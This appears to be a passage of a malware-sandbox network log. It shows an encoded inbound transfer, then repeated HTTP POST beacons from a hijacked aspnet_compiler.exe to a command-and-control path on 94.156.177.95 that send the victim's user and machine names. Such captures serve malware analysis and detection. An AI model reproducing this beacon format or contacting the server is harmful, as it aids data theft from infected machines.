                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                Nov 15, 2024 18:14:27.125540018 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                Nov 15, 2024 18:14:27.125587940 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                Nov 15, 2024 18:14:27.125638962 CET1236INData Raw: 43 4a 6b 51 2b 76 39 32 6f 63 36 33 73 34 2f 32 62 54 30 45 2b 41 77 46 47 47 6b 51 43 4a 70 51 43 70 2b 31 42 67 50 41 53 4b 41 4b 42 41 64 2b 43 4a 6b 30 58 48 41 2b 41 49 6b 51 43 4a 6b 47 35 42 4d 51 43 4a 6b 51 43 67 53 41 51 6e 76 64 2f 39
                                                                                                                Data Ascii: CJkQ+v92oc63s4/2bT0E+AwFGGkQCJpQCp+1BgPASKAKBAd+CJk0XHA+AIkQCJkG5BMQCJkQCgSAQnvd/9//vLkQCJkQCJkQCJkfRCJ09PkQCJkQCJYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                Nov 15, 2024 18:14:27.130619049 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsxGZuIzMUVVQFx0TAwGbk5iMzUGbvBAAlNmbhR3culUZ0FWZyN0bDBAEAAQZ6lGbhlGdp5WauV1bDBAbAAQZ6lGbhlGdp5WSvNEA+AAAsxGZuIzMMVkTSV0SAAAc


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.44973994.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:28.583125114 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 176
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:28.588136911 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: 'ckav.rujones888683JONES-PCk0FDD42EE188E931437F4FBE2CDybPc
                                                                                                                Nov 15, 2024 18:14:29.538896084 CET228INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:29 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 15
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.44974094.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:29.691334963 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 176
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:29.696597099 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: 'ckav.rujones888683JONES-PC+0FDD42EE188E931437F4FBE2C1T2R5
                                                                                                                Nov 15, 2024 18:14:30.671838045 CET228INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:30 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 15
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.44974194.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:30.789119005 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:30.795104027 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:31.757117987 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:31 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.44974294.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:31.914752960 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:31.919894934 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:32.888520002 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:32 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.44974394.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:33.052884102 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:33.059120893 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:34.033890963 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:33 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.44974494.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:34.174204111 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:34.179210901 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:35.158873081 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:35 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.44974594.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:35.320996046 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:35.327061892 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:36.284205914 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:36 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.44974694.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:36.464710951 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:36.470587015 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:37.438709974 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:37 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                10192.168.2.44974794.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:37.607319117 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:37.613187075 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:38.600548983 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:38 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                11192.168.2.44974894.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:38.762506008 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:38.767432928 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:39.761516094 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:39 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                12192.168.2.44974994.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:39.910825968 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:39.915788889 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:40.866601944 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:40 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                13192.168.2.44975094.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:41.016753912 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:41.021819115 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:42.015927076 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:41 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                14192.168.2.44975194.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:42.164769888 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:42.169694901 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:43.118540049 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:42 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                15192.168.2.44975294.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:43.289971113 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:43.295006037 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:14:44.288290024 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:14:44 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                16192.168.2.44975394.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:44.442001104 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:14:44.446887970 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
